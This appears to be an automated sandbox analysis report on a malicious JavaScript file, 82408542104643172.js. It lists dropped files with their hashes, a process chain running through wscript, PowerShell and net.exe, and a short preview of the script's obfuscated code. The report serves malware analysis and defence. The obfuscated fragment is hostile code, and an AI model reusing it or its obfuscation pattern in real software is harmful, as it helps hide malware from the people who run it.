Entropy (8bit): | 5.276477781489401 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJfbPtdPeUkwRe9:YvXKXDTcWCMmcWiGDV8Ukee9 |
MD5: | F396C1061710030A5B3086D33E90ED25 |
SHA1: | EAD8A09368DDEFB8287B07E7FDD625ED6A09666E |
SHA-256: | 99D3A70E9ECB4C415085C6AC4CF2D5C2ADA200DFB3DDD44E5A31D14DF9444F1D |
SHA-512: | 89757A673A32B72305D2D40DF1AAE86298642511B70DBE52F626FB773829F00BA65236BC3E82303F67F2F7CE13140F91BC6294A7B8EC952355F3092388B2D97B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.279110824657779 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJf21rPeUkwRe9:YvXKXDTcWCMmcWiG+16Ukee9 |
MD5: | 1D4349A79FB97DB77D5EB6D2DB7B0F43 |
SHA1: | E54D0A1FFFB726E4365D42AFB95B333493F43528 |
SHA-256: | A8F8C79C95DC8DCCFED7DF37E8AFEC91D409AA80C0E8FBFF047B954CE97E8A48 |
SHA-512: | D41E3C8D3F75673A67845CD6ADF44D0DE014374E77C64EE1ED3ACB98718C527DF5BBFDCC3E16303E8BA349A26E27010F20BA260D832B54AE770A075AB90EB3AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.6708676455485625 |
Encrypted: | false |
SSDEEP: | 24:Yv6XDDWHamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSQ:YvcifBgkDMUJUAh8cvMQ |
MD5: | 0BB346B24D0A078D7E10F65D4E5BB9CA |
SHA1: | B6FFD4EE0CA3C729B29DBF5EEC42C2CF3AC32EAB |
SHA-256: | BA3C736C553633F475FB0012976760D1AF993F64E6545FFA5166B008A92993F8 |
SHA-512: | DC7F869EF8D0FDBB4473A4EB5100ADB491BBF9FBB42B0603D4F0AD6B962A23BA977F6ECA1A1E406775109628ED9188186FC01DE0719A7246F2A3533ABC4AD730 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.2573658040609805 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJfshHHrPeUkwRe9:YvXKXDTcWCMmcWiGUUUkee9 |
MD5: | 7ACBF8A4081EE02D68B7A2443677D561 |
SHA1: | E1F39E41207A9717F3A73FCE9AFFC0ED5841B33F |
SHA-256: | 32169B3AE3C28EF65381A18CE8555ED385977746954887254FFAFAC5893CBECC |
SHA-512: | 4F43A7E702426DCE04FC778284C85EC864EEF72DDEC2F66396628AC0D32FDBBCA478DC1D741E16A7784A2915C28983ABBA5E19618E9D4B19B428A2C1BEB61EAF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.2674148954047295 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXJKGnTcadCMmnZiQ0YGaLxoAvJTqgFCrPeUkwRe9:YvXKXDTcWCMmcWiGTq16Ukee9 |
MD5: | 5001A1F5715B734890081310F34AC2B4 |
SHA1: | 4BD123F41F0DBC2B9E4F03B5C4066E5DCE9853C3 |
SHA-256: | 8195FE78E1C5A2DD73AA1BC699ECB3D88ED6EB1E6B3A6FF646628BE7451C830A |
SHA-512: | 9CED089CA7B97BD34F960D46278BEFFF8C7658EFCA8C76D3A8A006576D0C780E4BD564030A89F5F815489A758B8EBFAE8E02AF80512D030239A394D37992B833 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.137047393777863 |
Encrypted: | false |
SSDEEP: | 24:YJzyaBEYayftYkKuiX018XBMzTsVB37Gj6WFsj0Sqn163q2hX2LSECfSctHTic3r:YJYL6zTsVK6WF+wyXq3ctHWcbs/9c |
MD5: | F8D21B8E278F417BF3972CAAF1808EFF |
SHA1: | B06FA39F5CADF9F26E070A9DC763D2C6CE7265AA |
SHA-256: | 9C433BFB811BF4FA1570CE2020387DF47389D70727434E1EE5DD44E5DB2BCEAB |
SHA-512: | 6A5FD41849FE1231FDC756C973C8B5FCA72911401164B8F903CE758B8864C7B5EBE804A740DC43CB7FC98860D4ECF9D6D67EB68A6E1B3E0C80A0918D0E6AA372 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1459085662161568 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7ursfyCRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudh:TFl2GL7msfycXc+XcGNFlRYIX2v3kOyC |
MD5: | EE3FDD5EBF017EF23E5830AB7BAAC6D2 |
SHA1: | 9FDD2BAD4AFC057094E45E13C5128358EA232F40 |
SHA-256: | 4D35A68415D62CD5F924C710B231C0EC68EFF1167F110D44C0F9BB470D97D38A |
SHA-512: | 9497048C672383DC392FF152C6A9365AB64F97FF494F088C0493018548BE8FE305BC0F088B007ADBF14855A06B3F4758521DD78E0F5C35149959AED00BBC097B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.5523004867876606 |
Encrypted: | false |
SSDEEP: | 24:7+tlyCUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLux3qLxx/XYV:7MlyLXc+XcGNFlRYIX2vaqVl2GL7ms0 |
MD5: | B2F9D3433DA225490F9FC942E062CE07 |
SHA1: | 210A4E59EAC253CC9A415F5887A99710700D19E3 |
SHA-256: | 8A267D5F3B31B27AE628E4CE884BAF6A854E0F6BF612A86ACD5176C265F4A5EE |
SHA-512: | B56C1078B7C2C7034107824D1BB30E03ED2256E62C8E669514F4AEC3E62678B4D790E555D297764D1F30AD3735B3B73857DD99ACC5B0368DE09ED5967A05F024 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgNlErR01mNBy3uh6uaHqscej7aaYyu:6a6TZ44ADE3Erq1YU3uIuoPK |
MD5: | B05027D21B522ED860A426A60B140656 |
SHA1: | C8E7D38C0DD778F108649C159490941D599AEB44 |
SHA-256: | 29B544E928D5206C76F673ADD5E07FD13FC0388728CF438D5DA37AF34BB179FF |
SHA-512: | 1226E0A08C472060D6FA8D9ED0697B8700863A8D0072C626150F8050FEE8CBC400C7D5FF1EB588871C5B13249D36E32AF7B6EC7A99B205488B18E5248B256DEB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllulbnolz:NllUc |
MD5: | F23953D4A58E404FCB67ADD0C45EB27A |
SHA1: | 2D75B5CACF2916C66E440F19F6B3B21DFD289340 |
SHA-256: | 16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B |
SHA-512: | B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.511206980872271 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88ClGlpkle:Qw946cPbiOxDlbYnuRKdZrp |
MD5: | 0058496921F814434B8039087949553E |
SHA1: | D648221561EC2A3CBBAEDC5B572033C16162A6E0 |
SHA-256: | EEA4DE5F8370F9DAF0DF6A91B21EFF23B5E95F00496E1C58278A33A5C92F5B87 |
SHA-512: | 224BC119E06F4EF3636AD13D88231AF5CC0B8740115127E18EF74C44EE3FDE4F0693B96B279F8C21C24BE0658B7767AEBA2DD01216586919DD921FE7262E184E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 02-36-00-957.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.357782934652292 |
Encrypted: | false |
SSDEEP: | 384:8eUP8i5Dix93ACwth6LV8VIVdVWVHrUjeUaKDX7XcnJamYGa83jtoh24hUC/K/O2:4aG6z0+jFa |
MD5: | C70EFCAB2196A2B881A7EC5E11E1EC92 |
SHA1: | E640949298BF5D456E961EB6435EB0117FAA21F6 |
SHA-256: | EFE8A8FF99B617FDBEE89BEFBFD1E455D5D3CC6BC9988A108BA7FF93E53C25CB |
SHA-512: | D9421AC1852DA2059C93174DB9C6C4C38964B8B580697A01DC197241B253D5811F23571F6F43242A0DED285A4620F4F8F55E4A1681C1C310863999965FBAF891 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.396812449105038 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcb/cbuIKPcbJ:V3fOCIdJDe2Ks |
MD5: | EEC94097E6B23577A63AB54DDA73A38F |
SHA1: | F9EB47064D568572DF850BC5BBEC5D65114C1DD1 |
SHA-256: | F01C9B75199B5283A8D020401EE6A5DBF698A8512119FF4E55BC3233EFCBE58C |
SHA-512: | 48E254ACD8751E56FB60531EEE7F0C8F917477C90D6A7CD8B487DC3B62F67ACE1E873E5AD5621720DF05224C1FE00FB0CF191D3726A1AB0E2AB88371C148BB52 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDYYIGNPpe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZQ |
MD5: | E139E6D53A958755742760CD4A4456CB |
SHA1: | C259B619917152498BF74F65E11D03B50E4F80F1 |
SHA-256: | 542A482DF531973AFE108199E6DF1200DB2590E2E2F7B73C5CD428066EF9138E |
SHA-512: | 36222C1C5AD31244D808331760A7BEA22C20F3664709D0786260B538578CA184EF2634E844D682B92DEA9ACDEF3EA700B1C7C4972BE97B8C80ADF3945A92858B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru |
MD5: | 95F182500FC92778102336D2D5AADCC8 |
SHA1: | BEC510B6B3D595833AF46B04C5843B95D2A0A6C9 |
SHA-256: | 9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9 |
SHA-512: | D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.8964703173481885 |
TrID: | |
File name: | 82408542104643172.js |
File size: | 19'294 bytes |
MD5: | 1be7d051b8a3ad639c2c6fc6a6e1d22e |
SHA1: | 890013da273a7b490c4e42fa638ef6c7551601d5 |
SHA256: | 6feb77fd3ad2c5e4f1ad9c7db0c79bfbe78db712abec933aaeaf1dc5ad25ef8d |
SHA512: | 9d6aeadbe829c0eb87e50001a7c74fab504b70a0bf251b95109a518afd50ac0b0e467acc3e5d6ee6dd26adf0fe2ed156b801058f5b7c0d4914d846a30226631b |
SSDEEP: | 384:THFGwCLFj9rzANEApAyAsjSPGxrtKRgtreteuvZdddOLArX5mTpONgtKcg37mc08:wppzANEApAtexrtKRgtreteuvZdddOLY |
TLSH: | 258211501009CAF3DBECD9E187D5037982FE442C0A5C95DA6E43A1E8BB64E279CE35BD |
File Content Preview: | function hfwopic(){ootwewud=[1031,3079,5127,4103,2055,3072];var mkixygi=this[qqbjea+hseqexz+womre+kmiwm+fomhg+ndzijhrn+zloxedf+pgseevurl](this[clntuyfw+nkiauss+zmwzxherf+womre+iqngwygd+qqbjea+pgseevurl][qznuwavux+womre+fomhg+hseqexz+pgseevurl+fomhg+fbquxy |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 02:35:52 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff604b70000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 02:35:52 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff742250000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 02:35:52 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 02:35:52 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 02:35:57 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 02:35:57 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff742250000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 02:35:57 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff65b480000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 02:35:58 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 02:35:58 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7403e0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 02:35:58 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function hfwopic() { |
|
1 | ootwewud = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
